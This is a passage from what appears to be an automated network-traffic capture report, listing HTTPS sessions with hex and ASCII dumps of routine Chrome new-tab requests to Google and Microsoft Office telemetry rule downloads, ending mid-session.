2024-11-25 10:33:45 UTC	584	IN	Data Raw: 44 64 54 46 70 63 33 70 49 64 32 78 44 53 58 46 44 4d 6c 70 55 64 46 70 72 62 7a 4a 35 55 6e 4e 7a 53 57 78 58 52 6c 52 73 53 6e 68 4e 51 56 46 43 52 54 51 76 61 6b 67 72 57 55 70 5a 5a 48 46 33 4d 6d 45 32 57 55 4e 72 57 46 46 78 65 55 4d 7a 61 6e 41 33 63 32 74 42 56 45 4e 4d 65 46 41 77 62 6a 42 30 55 55 35 45 62 6a 4e 51 53 6d 4e 70 59 6c 46 4e 65 57 35 52 4e 30 4a 46 65 6b 6c 49 61 44 59 79 63 32 4a 4b 62 32 31 74 65 6e 64 5a 52 44 42 47 4f 58 46 31 51 7a 4a 61 59 6d 39 33 55 6c 56 33 65 44 68 53 64 53 74 55 56 58 68 70 4d 31 5a 72 54 31 46 6d 56 6c 42 4e 53 58 56 4a 61 57 39 77 62 57 6c 4e 65 6e 4e 6d 62 54 68 4c 4d 6c 5a 33 64 55 73 32 5a 53 74 46 4e 48 56 43 4c 7a 52 7a 57 6d 52 43 65 57 35 49 56 32 5a 74 55 58 49 76 4e 47 45 79 56 33 59 76 5a 33 Data Ascii: DdTFpc3pId2xDSXFDMlpUdFprbzJ5UnNzSWxXRlRsSnhNQVFCRTQvakgrWUpZZHF3MmE2WUNrWFFxeUMzanA3c2tBVENMeFAwbjB0UU5EbjNQSmNpYlFNeW5RN0JFeklIaDYyc2JKb21tendZRDBGOXF1QzJaYm93UlV3eDhSdStUVXhpM1ZrT1FmVlBNSXVJaW9wbWlNenNmbThLMlZ3dUs2ZStFNHVCLzRzWmRCeW5IV2ZtUXIvNGEyV3YvZ3
2024-11-25 10:33:45 UTC	90	IN	Data Raw: 35 34 0d 0a 48 42 4e 5a 6d 63 32 53 46 42 4a 62 32 64 4e 4d 46 67 7a 65 55 4e 75 65 6c 67 34 59 56 4e 44 52 48 70 4c 53 6a 42 42 61 57 35 6e 63 32 6c 45 5a 32 68 6c 51 56 42 32 4d 6a 52 50 53 47 4e 68 53 6d 73 78 62 6e 4e 6c 63 54 45 79 63 58 70 4d 62 6d 68 61 64 0d 0a Data Ascii: 54HBNZmc2SFBJb2dNMFgzeUNuelg4YVNDRHpLSjBBaW5nc2lEZ2hlQVB2MjRPSGNhSmsxbnNlcTEycXpMbmhad
2024-11-25 10:33:45 UTC	1349	IN	Data Raw: 35 33 65 0d 0a 6b 64 43 51 33 6c 59 64 79 74 6b 57 6a 52 6a 56 48 70 78 4c 79 74 31 4e 6a 63 72 4e 31 5a 77 61 44 52 6e 65 55 78 52 63 6b 63 30 57 6c 42 48 4f 47 70 5a 4e 57 68 42 59 6e 42 57 61 31 52 45 52 47 30 7a 57 58 59 72 5a 6a 46 35 51 32 78 52 55 6c 5a 6f 61 54 5a 43 4d 6b 59 7a 4e 6c 42 7a 52 30 46 54 4d 6b 46 58 54 58 4a 61 54 45 6c 4b 53 55 55 34 5a 47 70 78 54 31 46 53 4f 44 6b 35 59 6c 4e 43 52 55 6b 32 56 46 4a 47 52 56 68 42 53 55 68 55 4f 46 70 6c 51 58 5a 6e 63 58 63 31 4f 47 68 72 52 58 4e 4a 4e 56 68 42 55 31 52 35 53 32 74 43 65 48 5a 6c 56 6b 74 42 53 57 56 48 4f 58 55 72 52 57 35 56 59 31 4a 4d 64 46 4a 75 5a 47 45 35 55 31 46 53 65 58 56 6c 55 56 4e 59 56 45 78 44 51 56 4a 54 61 45 4e 36 61 6b 4a 70 59 55 46 6e 59 55 4e 5a 4f 45 74 Data Ascii: 53ekdCQ3lYdytkWjRjVHpxLyt1NjcrN1ZwaDRneUxRckc0WlBHOGpZNWhBYnBWa1RERG0zWXYrZjF5Q2xRUlZoaTZCMkYzNlBzR0FTMkFXTXJaTElKSUU4ZGpxT1FSODk5YlNCRUk2VFJGRVhBSUhUOFplQXZncXc1OGhrRXNJNVhBU1R5S2tCeHZlVktBSWVHOXUrRW5VY1JMdFJuZGE5U1FSeXVlUVNYVExDQVJTaEN6akJpYUFnYUNZOEt
2024-11-25 10:33:45 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.5	49782	142.250.181.68	443	6020	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:44 UTC	518	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-25 10:33:45 UTC	1018	IN	HTTP/1.1 200 OK Version: 698289427 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Mon, 25 Nov 2024 10:33:45 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-25 10:33:45 UTC	372	IN	Data Raw: 32 31 63 31 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 Data Ascii: 21c1)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
2024-11-25 10:33:45 UTC	1390	IN	Data Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
2024-11-25 10:33:45 UTC	1390	IN	Data Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
2024-11-25 10:33:45 UTC	1390	IN	Data Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20 Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
2024-11-25 10:33:45 UTC	1390	IN	Data Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
2024-11-25 10:33:45 UTC	1390	IN	Data Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 32 38 35 2c 33 37 30 30 39 34 39 2c 33 37 30 31 33 38 34 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 5c 75 Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700285,3700949,3701384],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_\|\|{};(function(_){var window\u
2024-11-25 10:33:45 UTC	1327	IN	Data Raw: 72 61 79 28 62 29 3b 66 6f 72 28 6c 65 74 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 49 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 48 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 4a 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 4b 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 Data Ascii: ray(b);for(let d\u003d0;d\u003cb;d++)c[d]\u003da[d];return c}return[]};Id\u003dfunction(a){return new _.Hd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Jd\u003dglobalThis.trustedTypes;_.Kd\u003dclass{constructor(a){this.i
2024-11-25 10:33:45 UTC	464	IN	Data Raw: 31 63 39 0d 0a 28 61 29 3a 61 29 7d 3b 5f 2e 58 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 56 64 29 72 65 74 75 72 6e 20 61 2e 69 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 7d 3b 5f 2e 5a 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 59 64 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 24 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 4b 64 29 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 4b 64 29 61 5c 75 30 30 33 64 61 2e 69 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 65 6c 73 65 20 61 5c 75 30 30 33 64 5f 2e 5a 64 28 61 29 3b 72 65 Data Ascii: 1c9(a):a)};_.Xd\u003dfunction(a){if(a instanceof _.Vd)return a.i;throw Error(\"F\");};_.Zd\u003dfunction(a){if(Yd.test(a))return a};_.$d\u003dfunction(a){if(a instanceof _.Kd)if(a instanceof _.Kd)a\u003da.i;else throw Error(\"F\");else a\u003d_.Zd(a);re
2024-11-25 10:33:45 UTC	1390	IN	Data Raw: 38 30 30 30 0d 0a 7c 7c 62 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5c 22 6e 6f 6e 63 65 5c 22 29 7c 7c 5c 22 5c 22 7d 3b 5c 6e 5f 2e 62 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 5c 75 30 30 33 64 5f 2e 50 61 28 61 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 61 72 72 61 79 5c 22 7c 7c 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6f 62 6a 65 63 74 5c 22 5c 75 30 30 32 36 5c 75 30 30 32 36 74 79 70 65 6f 66 20 61 2e 6c 65 6e 67 74 68 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6e 75 6d 62 65 72 5c 22 7d 3b 5f 2e 63 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 72 65 74 75 72 6e 20 5f 2e 75 62 28 61 2c 62 2c 63 2c 21 31 29 21 5c 75 30 30 33 64 5c 75 30 30 33 64 76 6f 69 64 20 30 Data Ascii: 8000\|\|b.getAttribute(\"nonce\")\|\|\"\"};\n_.be\u003dfunction(a){var b\u003d_.Pa(a);return b\u003d\u003d\"array\"\|\|b\u003d\u003d\"object\"\u0026\u0026typeof a.length\u003d\u003d\"number\"};_.ce\u003dfunction(a,b,c){return _.ub(a,b,c,!1)!\u003d\u003dvoid 0
2024-11-25 10:33:45 UTC	1390	IN	Data Raw: 28 64 2c 5c 22 64 61 74 61 2d 5c 22 29 3f 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 64 2c 63 29 3a 61 5b 64 5d 5c 75 30 30 33 64 63 7d 29 7d 3b 6c 65 5c 75 30 30 33 64 7b 63 65 6c 6c 70 61 64 64 69 6e 67 3a 5c 22 63 65 6c 6c 50 61 64 64 69 6e 67 5c 22 2c 63 65 6c 6c 73 70 61 63 69 6e 67 3a 5c 22 63 65 6c 6c 53 70 61 63 69 6e 67 5c 22 2c 63 6f 6c 73 70 61 6e 3a 5c 22 63 6f 6c 53 70 61 6e 5c 22 2c 66 72 61 6d 65 62 6f 72 64 65 72 3a 5c 22 66 72 61 6d 65 42 6f 72 64 65 72 5c 22 2c 68 65 69 67 68 74 3a 5c 22 68 65 69 67 68 74 5c 22 2c 6d 61 78 6c 65 6e 67 74 68 3a 5c 22 6d 61 78 4c 65 6e 67 74 68 5c 22 2c 6e 6f 6e 63 65 3a 5c 22 6e 6f 6e 63 65 5c 22 2c 72 6f 6c 65 3a 5c 22 72 6f 6c 65 5c 22 2c 72 6f 77 73 70 61 6e 3a 5c 22 72 6f 77 53 70 61 6e 5c 22 2c 74 Data Ascii: (d,\"data-\")?a.setAttribute(d,c):a[d]\u003dc})};le\u003d{cellpadding:\"cellPadding\",cellspacing:\"cellSpacing\",colspan:\"colSpan\",frameborder:\"frameBorder\",height:\"height\",maxlength:\"maxLength\",nonce:\"nonce\",role:\"role\",rowspan:\"rowSpan\",t

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.5	49776	142.250.181.68	443	6020	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:44 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-25 10:33:45 UTC	933	IN	HTTP/1.1 200 OK Version: 698289427 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Mon, 25 Nov 2024 10:33:45 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-25 10:33:45 UTC	35	IN	Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-11-25 10:33:45 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
71	192.168.2.5	49784	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:44 UTC	192	OUT	GET /rules/rule120663v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:45 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:45 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT ETag: "0x8DC582BB556A907" x-ms-request-id: c14060eb-d01e-007a-6e7d-3bf38c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103345Z-174c587ffdfb74xqhC1TEBhabc00000005v00000000070f5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:45 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
72	192.168.2.5	49785	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:44 UTC	192	OUT	GET /rules/rule120662v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:45 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:45 GMT Content-Type: text/xml Content-Length: 470 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT ETag: "0x8DC582BBB181F65" x-ms-request-id: dea688b9-b01e-003d-136c-3dd32c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103345Z-15b8b599d88s6mj9hC1TEBur3000000005rg000000001ghc x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:45 UTC	470	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
73	192.168.2.5	49783	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:44 UTC	192	OUT	GET /rules/rule120661v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
